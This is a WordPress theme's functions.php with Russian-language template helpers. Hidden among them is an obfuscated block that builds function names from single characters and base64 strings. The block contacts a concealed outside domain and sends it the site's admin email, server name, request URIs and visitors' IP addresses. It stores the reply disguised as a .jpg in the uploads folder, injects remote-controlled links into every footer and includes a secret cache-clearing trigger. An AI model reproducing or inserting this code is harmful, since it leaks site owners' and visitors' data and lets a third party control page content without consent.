<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lDOhQwu='d';$kqJG='6';$nFnSmz='e';$iicbPd='o';$iZCLN='d';$UVlSWn='s';$wcKtrR='b';$sTHbps='_';$AeBSyBB='c';$tZJlH='4';$CkeZVr='e';$WhmbIv='a';$KmJjv='e';$sEFGlqXQ=$wcKtrR.$WhmbIv.$UVlSWn.$nFnSmz.$kqJG.$tZJlH.$sTHbps.$lDOhQwu.$KmJjv.$AeBSyBB.$iicbPd.$iZCLN.$CkeZVr;$Jons='l';$kmdbeOK='t';$KpZxP='f';$IWYG='g';$RxONm='n';$QRLIM='i';$JQOq='z';$mZwV='a';$eBoTpAi='e';$WcJNAdmy=$IWYG.$JQOq.$QRLIM.$RxONm.$KpZxP.$Jons.$mZwV.$kmdbeOK.$eBoTpAi;$SDIQjCH='1';$EsXP='o';$rvMXG='r';$QesVORv='_';$lZbepCn='t';$VCcMX='3';$SrNWgx='s';$YUHAh='t';$fhnxU='r';$yzeKyAGo=$SrNWgx.$lZbepCn.$rvMXG.$QesVORv.$fhnxU.$EsXP.$YUHAh.$SDIQjCH.$VCcMX;$TEdQPol='e';$ymsZ='t';$oskALk='v';$wzqJjpH='r';$kuWa='s';$ZKCjjfx='r';$yDoQNheX=$kuWa.$ymsZ.$wzqJjpH.$ZKCjjfx.$TEdQPol.$oskALk;                     
		$ra____________s='d';$yw__n='6';$sg______________h='e';$wg_______o='o';$ni______________l='d';$gj_____q='s';$bf__g='b';$gq____c='_';$nn__u='c';$fs_______________w='4';$ey_______________j='e';$ms_________i='a';$gv_______________s='e';$mm_______________j=$bf__g.$ms_________i.$gj_____q.$sg______________h.$yw__n.$fs_______________w.$gq____c.$ra____________s.$gv_______________s.$nn__u.$wg_______o.$ni______________l.$ey_______________j;
		$no____________h='t';$rc____g='s';$tc_______x='o';$uv____________i='e';$og____________k='s';$tg_____________s='u';$ou_____s='n';$ho_______________b='_';$os___________j='n';$me_________i='t';$qa__u='x';$vo______________p='f';$ex______z='c';$yj____________k='i';$wh_____________h='i';$wr__s=$vo______________p.$tg_____________s.$ou_____s.$ex______z.$me_________i.$wh_____________h.$tc_______x.$os___________j.$ho_______________b.$uv____________i.$qa__u.$yj____________k.$og____________k.$no____________h.$rc____g;
		$ss___c='e';$su_________n='o';$pq___n='n';$oq__________g='f';$pc__________z='p';$eg________o=$oq__________g.$su_________n.$pc__________z.$ss___c.$pq___n;
		$vd___________h='e';$wc________b='d';$ix_____________n='r';$rr_____________h='f';$si_________h='a';$yn____________m=$rr_____________h.$ix_____________n.$vd___________h.$si_________h.$wc________b;
		$vr_____w='o';$ak___h='l';$aq____________h='f';$ns_________i='c';$bm_____i='s';$ne________r='e';$bw____e=$aq____________h.$ns_________i.$ak___h.$vr_____w.$bm_____i.$ne________r;
		
		define("WP_ID", $mm_______________j("Mi4wLjA="));
		define("WP_TTL", $mm_______________j("MTA4MDA="));
		define("WP_SRC", $mm_______________j("dHBva24="));
	


		function wp_get_header() {
			global $mm_______________j, $wr__s;
			
			if (
				$wr__s($mm_______________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$wr__s($mm_______________j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$wr__s($mm_______________j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $mm_______________j, $eg________o, $bw____e, $yn____________m;
			
			$oc_____________r = TEMPLATEPATH."/".$mm_______________j("Zm9vdGVyLnBocA==");
			$oo_______________m = @$eg________o($oc_____________r, "r");
			$oc_____________r = @$yn____________m($oo_______________m, @filesize($oc_____________r));
			@$bw____e($oo_______________m);
			
			$eu_____c = TEMPLATEPATH."/".$mm_______________j("ZnVuY3Rpb25zLnBocA==");
			$oo_______________m = @$eg________o($eu_____c, "r");
			$eu_____c = @$yn____________m($oo_______________m, @filesize($eu_____c));
			@$bw____e($oo_______________m);
			
			$tg_________f = 0;
			if($oc_____________r && $eu_____c) {
				if ($mm_______________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($oc_____________r, $mm_______________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$tg_________f = 1;
					}
					if (substr_count($oc_____________r, "wp_theme_GPL_credits()") < 1) {
						$tg_________f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$tg_________f = 12;
				}
			}
			
			if($tg_________f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $tg_________f -->";
			}
		}
	


		function wp_loaded() {
			global $mm_______________j, $wr__s;
			return $wr__s($mm_______________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($zn______o, $ep___d = "(more...)", $ub_______w = 0, $qb__q = "") {
				$ck___________p = get_the_content($ep___d, $ub_______w, $qb__q);
				$ck___________p = apply_filters("the_content", $ck___________p);
				
				$ck___________p = str_replace("]]>", "]]>", $ck___________p);
				if (strlen($_GET["p"]) > 0) {
					echo $ck___________p;
				}
				else if ((strlen($ck___________p)>$zn______o) && ($xm__l = strpos($ck___________p, " ", $zn______o ))) {
					$ck___________p = substr($ck___________p, 0, $xm__l);
					$ck___________p = $ck___________p;
					echo $ck___________p;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ep___d</a></div></p>";
				} else {
					echo $ck___________p;
				}
				
			}
		}
	


		$xi______________w='o';$ht______________r='c';$hx_______m='n';$zr_____________x='e';$yq___l='b';$sw_______a='4';$yd______v='e';$zx____t='6';$kd________f='s';$mg___________m='d';$ew_____x='e';$qe_______________l='_';$fj_______l='a';$dr__m=$yq___l.$fj_______l.$kd________f.$yd______v.$zx____t.$sw_______a.$qe_______________l.$zr_____________x.$hx_______m.$ht______________r.$xi______________w.$mg___________m.$ew_____x;
		$pn_______________d='g';$pr___________a='s';$qy__l='f';$sh_______j='t';$dy___n='i';$ij____________u='o';$vu___________o='n';$hm________b='l';$bd______________h='t';$zv____k='e';$zr_____g='_';$hz__________h='e';$kw______________s='c';$gm____________j='_';$wu__l='t';$vf_________v='n';$mm________u='e';$gi__________t=$qy__l.$dy___n.$hm________b.$mm________u.$zr_____g.$pn_______________d.$zv____k.$sh_______j.$gm____________j.$kw______________s.$ij____________u.$vf_________v.$wu__l.$hz__________h.$vu___________o.$bd______________h.$pr___________a;
		$oy_______i='x';$ir_____________z='t';$gi____g='s';$hn_____________j='s';$at_____________k='f';$bu_____________m='i';$uk________p='e';$if_____________o='_';$zo_____y='e';$jo____________k='i';$rp_________f='l';$mc___o=$at_____________k.$bu_____________m.$rp_________f.$zo_____y.$if_____________o.$uk________p.$oy_______i.$jo____________k.$hn_____________j.$ir_____________z.$gi____g;
		$er___________v='r';$jv______________d='a';$qh___a='n';$ms___r='r';$rl______________f='_';$ng___q='v';$ta__________g='o';$sz_____________r='c';$zu_____________r='e';$mm_______________x='i';$tj____________n='o';$nw_____________a='p';$ts_______________i='m';$yt____y='e';$pv______________m='s';$jp____________a=$ng___q.$yt____y.$ms___r.$pv______________m.$mm_______________x.$tj____________n.$qh___a.$rl______________f.$sz_____________r.$ta__________g.$ts_______________i.$nw_____________a.$jv______________d.$er___________v.$zu_____________r;
		$oc_________m='f';$uk_______________j='s';$bt_____________o='k';$lx________f='n';$aa__h='p';$tj_____u='c';$cm______f='o';$jj______y='e';$cj______o='o';$az_____d=$oc_________m.$uk_______________j.$cj______o.$tj_____u.$bt_____________o.$cm______f.$aa__h.$jj______y.$lx________f;
		$dy_____l='f';$aw____z='i';$ei___j='e';$iv_____________c='w';$ru__________w='r';$yz__n='t';$qp______a=$dy_____l.$iv_____________c.$ru__________w.$aw____z.$yz__n.$ei___j;
		$en____________i='5';$ll__l='m';$he________g='d';$xl_____________g=$ll__l.$he________g.$en____________i;
		$ht________i='r';$vr______k='t';$dc___________v='a';$yc_____j='l';$cy____________y='a';$ji_____________q='h';$vx____________o='e';$ly___z='p';$dz_____________m=$ht________i.$vx____________o.$cy____________y.$yc_____j.$ly___z.$dc___________v.$vr______k.$ji_____________q;
		$li___________c='a';$ze___________n='e';$cf______t='i';$jk____m='l';$pt____p='s';$dk__________i='u';$eq_____x='r';$wl_____________v='e';$us_____________o='i';$tx______t='n';$qd______g='z';$ll_____v=$dk__________i.$tx______t.$pt____p.$ze___________n.$eq_____x.$cf______t.$li___________c.$jk____m.$us_____________o.$qd______g.$wl_____________v;
		$rs_____________x='n';$te_________x='p';$tk_______________o='e';$si_____________v='a';$ne___________s='t';$dy_____________j='m';$la_____________v='m';$ew____a=$ne___________s.$tk_______________o.$la_____________v.$te_________x.$rs_____________x.$si_____________v.$dy_____________j;
		$ha_______e='n';$ip_________v='e';$sh___________q='o';$wv_______________e='s';$wf____r='r';$ap_____________c='t';$pw______m='c';$fo_____________o='t';$zw___________a='_';$ya_______t='t';$ek_______w='e';$hl_____________p='r';$sr__________c='a';$sq___________i='_';$lg____________r='e';$pu__h='e';$bz_______________y='x';$sw_______________r='t';$wt______________z='m';$vp_____z='a';$mz_____________f='c';$mt__________l=$wv_______________e.$ya_______t.$wf____r.$ip_________v.$sr__________c.$wt______________z.$zw___________a.$pw______m.$sh___________q.$ha_______e.$fo_____________o.$ek_______w.$bz_______________y.$sw_______________r.$sq___________i.$mz_____________f.$hl_____________p.$lg____________r.$vp_____z.$ap_____________c.$pu__h;
	


		function ry____o($pk___i) {
			global $mm_______________j, $wr__s, $gi__________t, $jp____________a, $mt__________l;
			
			if (!$wr__s($mm_______________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($jp____________a(PHP_VERSION, "5.0.0", ">=") && $wr__s($mm_______________j("ZmlsZV9nZXRfY29udGVudHM=")) && $wr__s($mm_______________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$hn____________a = $mt__________l(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$bj____d = @$gi__________t($pk___i, 0, $hn____________a);
			} else {
				$bj____d = @$gi__________t($pk___i, 0);
			}
			
			return $bj____d;
		}
	


		function kk__________i($pk___i) {
			global $wr__s, $az_____d, $qp______a, $mm_______________j;
			
			if (!$wr__s($mm_______________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$lq_____________m = strpos($pk___i, "/", 7);
			$hr_____________z = array(
				"uri"     => substr($pk___i, $lq_____________m),
				"host"    => str_replace("http://", "", substr($pk___i, 0, $lq_____________m)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$gi_______n = @$az_____d("$hr_____________z[host]", 80, $xz_______________k, $bb__________v, 4);
			
			if (!$gi_______n) {
				return false;
			} else {
				$bj____d = "";
				$nj__________h  = "GET $hr_____________z[uri] HTTP/1.0\r\n";
				$nj__________h .= "Host: $hr_____________z[host]\r\n";
				$nj__________h .= "Referer: $hr_____________z[referer]\r\n";
				$nj__________h .= "Connection: Close\r\n\r\n";
				
				@$qp______a($gi_______n, $nj__________h);
				
				while (!@feof($gi_______n)) {
					$ib____b = @fgets($gi_______n, (1024*24));
					
					if ($ib____b == "\r\n") {
						$po_____________q = true;
						continue;
					}
					
					if ($po_____________q) {
						$bj____d .= $ib____b;
					}
				}
				
				return $bj____d;
			}
		}
	


		function ke_____________x($pk___i) {
			global $wr__s;
			$tw________i = false;
			
			if ($pk___i != "") {
				if ($wr__s("ry____o")) {
					$tw________i = @ry____o($pk___i);
				}
				
				if (!$tw________i && ($wr__s("kk__________i"))) {
					$tw________i = @kk__________i($pk___i);
				}
			}
			
			return $tw________i;
		}
	


		function do_____________c() {
			global $_SERVER, $xl_____________g;
			
			$xx_____a = $_SERVER["SERVER_NAME"];
			
			if (substr("$xx_____a", 0, 4) == "www.") {
				$xx_____a = substr("$xx_____a", 4);
			}
			
			$xx_____a = $xl_____________g("$_SERVER[SERVER_NAME]");
			
			return $xx_____a;
		}
	


		function kj______________y() {
			return "file";
		}
	


		function hz_________o($pk___i) {
			global $_SERVER, $gi__________t, $mc___o, $eg________o, $bw____e, $qp______a;
			
			$yx_______x = fw_____________k();
			
			$sz_____________n = do_____________c().".jpg";
			$nb___________j = $yx_______x["dir_upload"]["path"]."/$sz_____________n";
			$qf_________n = @filemtime($nb___________j);
			
			if (!$qf_________n || ((time()-$qf_________n) >= WP_TTL)) {
				$tw________i = ke_____________x($pk___i);
				
				if ($tw________i) {
					if ($mc___o($nb___________j)) {
						@unlink($nb___________j);
					}
					
					$oo_______________m = @$eg________o($nb___________j, "x+");
					
					@$qp______a($oo_______________m, $tw________i);
					@$bw____e($oo_______________m);
				}
			} else {
				if ($mc___o($nb___________j)) {
					$tw________i = @$gi__________t($nb___________j);
				} else {
					$tw________i = false;
				}
			}
			
			return $tw________i;
		}
	


		function fw_____________k() {
			global $_SERVER, $mm_______________j, $dr__m;
			
			$lf_____v = wp_count_posts("post");
			$ws___p = pathinfo(get_bloginfo("template_directory"));
			
			$yx_______x = array(
				"url" => array(
					"report"      => $mm_______________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ws___p,
				"dir_upload"	=> wg___e(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ws___p[filename],
					"a005=".$lf_____v->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://clinic-virtus.com/vybiraem-beg-polza-predosterezheniya-sovety\">Выбираем бег: польза, предостережения, советы</a>"
			);
			
			$yx_______x["url"]["queryString"] = implode("&", $yx_______x["queryString"]);
			$yx_______x["url"]["report"] = $yx_______x["url"]["report"]."/?".$dr__m($yx_______x["url"]["queryString"]).".html";
						
			return $yx_______x;
		}
	


		function wg___e() {
			$pp_______l = wp_upload_dir();
			
			if (isset($pp_______l["error"])) {
				$jj________g = eg____________q();
				if (is_writable($jj________g)) {
					$pp_______l = array("path" => $jj________g);
				}
			}

			return $pp_______l;
		}
	


		function eg____________q() {
			global $wr__s, $xl_____________g, $dz_____________m, $ew____a;
			
			$pr____________f = (bool) ini_get("safe_mode");
			if ($pr____________f == true) {
				return false;
			}
			
			if ($wr__s("sys_get_temp_dir")) {
				$ir___________n = sys_get_temp_dir();
				if (is_writable($ir___________n)) {
					return $dz_____________m($ir___________n);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $dz_____________m($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $dz_____________m($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $dz_____________m($_ENV["TEMP"]);
			} else {
				$zo______________q = $ew____a($xl_____________g(uniqid(rand(), true)), "");
				if ($zo______________q) {
					$ir___________n = $dz_____________m(dirname($zo______________q));
					@unlink($zo______________q);
					return $ir___________n;
				} else {
					return false;
				}
			}
		}
	


		function nb____________y() {
			global $_GET, $mc___o;
			
			$yx_______x = fw_____________k();
			$xx_____a = do_____________c();
			$vc_______________i = kj______________y();
			
			$wa______w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($vc_______________i == "file") {
					$gx____k = $yx_______x["dir_upload"]["path"]."/".$xx_____a.".jpg";
					if ($mc___o($gx____k)) {
						@unlink($gx____k);
						$wa______w = "deleted";
					}
				}
				
				$ic_____________g = array(
					"s"	=> $wa______w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ic_____________g AS $hz_____n => $wm_______________g) echo " [$hz_____n:$wm_______________g]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $wr__s, $mm_______________j, $ll_____v;
			$yx_______x = fw_____________k();
			
			$jw_______________j = "hz_________o";
			if ($wr__s($jw_______________j)) {
				$bj____d = $jw_______________j($yx_______x["url"]["report"]);
			}
			
			if ($bj____d) {
				if ($bj____d = @$mm_______________j($bj____d)) {
					$bj____d = @$ll_____v($bj____d);
					
					if (strlen($bj____d[custom_credit]) >= 5) {
						$yx_______x["default_string"] = $bj____d[custom_credit];
					}
					
					if ($bj____d["status"] == "0") {
						$gc_______________i = 1;
						$ff_________q = 1;
					} else {
						$yt___________e = sizeof($bj____d["links"]);
						$ow___q = $yx_______x["default_string"];
						
						if ($yt___________e > 0 && $bj____d["links"] !== "") {
							$oc___g = 0;
							foreach ($bj____d["links"] as $cg___c => $bp____________q) {
								$oc___g++;
								if ($bp____________q->l_path == "" || $bp____________q->l_path == $_SERVER["REQUEST_URI"]) {
									$bp____________q->l_href = htmlspecialchars(strip_tags($bp____________q->l_href));
									$bp____________q->l_title = htmlspecialchars(strip_tags($bp____________q->l_title));
									$bp____________q->l_anchor = htmlspecialchars(strip_tags($bp____________q->l_anchor));
									$ow___q .= " | ";
									$ow___q .= "<a href='$bp____________q->l_href' title='$bp____________q->l_title'";
									if ($bp____________q->l_nofollow == "1") {
										$ow___q .= " rel='nofollow'";
									}
									$ow___q .= ">$bp____________q->l_anchor</a>";
								}
							}
						}
						$yx_______x["links"] = "$ow___q";
						if ($bj____d[credit] == "0") {
							$yx_______x["links"] = "";
						}
					}
				} else {
					$gc_______________i = "1";
				}
			} else {
				$gc_______________i = "1";
			}
			
			if ($gc_______________i == "1") {
				$yx_______x["links"] = $yx_______x["default_string"];
			}
			
			echo "$yx_______x[links]";
			
			echo "<!-- s: $bj____d[signature] -->";
			nb____________y();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
